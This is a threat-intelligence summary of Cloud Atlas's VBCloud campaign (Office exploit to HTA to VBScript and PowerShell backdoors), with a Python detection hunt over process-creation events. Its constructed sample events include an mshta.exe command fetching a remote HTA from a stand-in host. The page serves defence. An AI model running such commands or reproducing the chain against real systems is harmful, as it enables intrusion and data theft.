
Cloud Atlas using a new backdoor, VBCloud, to steal data

· Published 23/12/2024 13:25 · Modified 23/12/2024 15:16


Essential information

Tags: 2024-12-23, CVE-2018-0802, vbcloud, vbshower
Related entities: 1 vulnerability (CVE), 16 observables, 1 intrusion set (APT), 21 techniques (MITRE ATT&CK), 3 malware, 7 others

Description

Cloud Atlas, a threat group active since 2014, has introduced a new backdoor, VBCloud, in its latest campaign targeting Eastern Europe and Central Asia. The attack chain begins with phishing emails carrying malicious documents that exploit CVE-2018-0802, a memory-corruption flaw in the Microsoft Office Equation Editor (EQNEDT32.EXE). The exploit downloads and executes an HTA file, which deploys the VBShower backdoor. VBShower in turn installs both the VBCloud and PowerShower backdoors. VBCloud replicates VBShower's earlier capabilities: downloading and executing malicious plugins, communicating with cloud servers, and running tasks on the host. The campaign's goal is data theft: VBCloud collects system information and exfiltrates files, while PowerShower is used for network reconnaissance and further infiltration of the victim's network.
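The delivery chain above (Office document, Equation Editor exploit, HTA download, VBScript and PowerShell stages) leaves a distinctive process ancestry: Equation Editor or an Office host launching mshta.exe with a remote URL, followed by wscript.exe or powershell.exe children. The following hunt over process-creation telemetry is an added example written for this page, not code from the original report or from any vendor tooling. The event field names are assumptions modelled on Sysmon Event ID 1, and every sample event (host names, paths, the example.invalid URL) is constructed for the demonstration.

```python
"""Hunt for a Cloud Atlas-style HTA delivery chain in process-creation events.

Indicators scored per mshta.exe process:
  1. an Office or Equation Editor ancestor (CVE-2018-0802 lives in EQNEDT32.EXE;
     it is COM-launched, so its parent is svchost.exe, not WINWORD.EXE, which
     is why eqnedt32.exe itself is in the watch set),
  2. a remote HTA (URL on the mshta.exe command line),
  3. script-host children (wscript/cscript for VBShower, powershell for PowerShower).
Field names (pid, ppid, image, cmdline) are assumptions; events are constructed.
"""
import re
from typing import Dict, List, Optional

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
STAGE_TWO = {"wscript.exe", "cscript.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _office_ancestor(ev: Dict, by_pid: Dict[int, Dict]) -> Optional[str]:
    """Walk the parent chain; return the first Office/Equation Editor ancestor."""
    seen = set()
    cur = by_pid.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])  # guard against pid reuse loops in telemetry
        name = _basename(cur["image"])
        if name in OFFICE_HOSTS:
            return name
        cur = by_pid.get(cur["ppid"])
    return None


def detect_hta_chain(events: List[Dict]) -> List[Dict]:
    """Return one finding per mshta.exe process that shows any chain indicator."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if _basename(ev["image"]) != "mshta.exe":
            continue
        ancestor = _office_ancestor(ev, by_pid)
        url = URL_RE.search(ev["cmdline"])
        children = sorted(
            _basename(c["image"]) for c in events
            if c["ppid"] == ev["pid"] and _basename(c["image"]) in STAGE_TWO
        )
        score = sum([ancestor is not None, url is not None, bool(children)])
        if score:
            findings.append({
                "pid": ev["pid"],
                "office_ancestor": ancestor,
                "remote_hta": url.group(0) if url else None,
                "script_children": children,
                "score": score,
                "severity": "high" if score >= 2 else "medium",
            })
    return findings


# Constructed sample telemetry: one malicious chain plus benign mshta/powershell use.
SAMPLE_EVENTS = [
    {"pid": 50, "ppid": 4, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k DcomLaunch"},
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'WINWORD.EXE /n "C:\Users\victim\Downloads\invoice.doc"'},
    {"pid": 300, "ppid": 50, "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": '"EQNEDT32.EXE" -Embedding'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/update.hta"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\victim\AppData\Local\Temp\stage.vbs"},
    # Benign: a local vendor help file opened from Explorer, no script children.
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile"},
]

if __name__ == "__main__":
    for f in detect_hta_chain(SAMPLE_EVENTS):
        print(f)
```

Only the mshta.exe process spawned by Equation Editor is reported: it scores on all three indicators (Equation Editor ancestor, remote HTA URL, wscript.exe child), while the locally launched vendor HTA scores zero and is suppressed. In a real deployment the same three checks map onto a SIEM query joining process-creation events on parent PID; the scoring keeps a single indicator (for example a remote HTA with no Office ancestry) visible at medium severity rather than dropping it.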

External references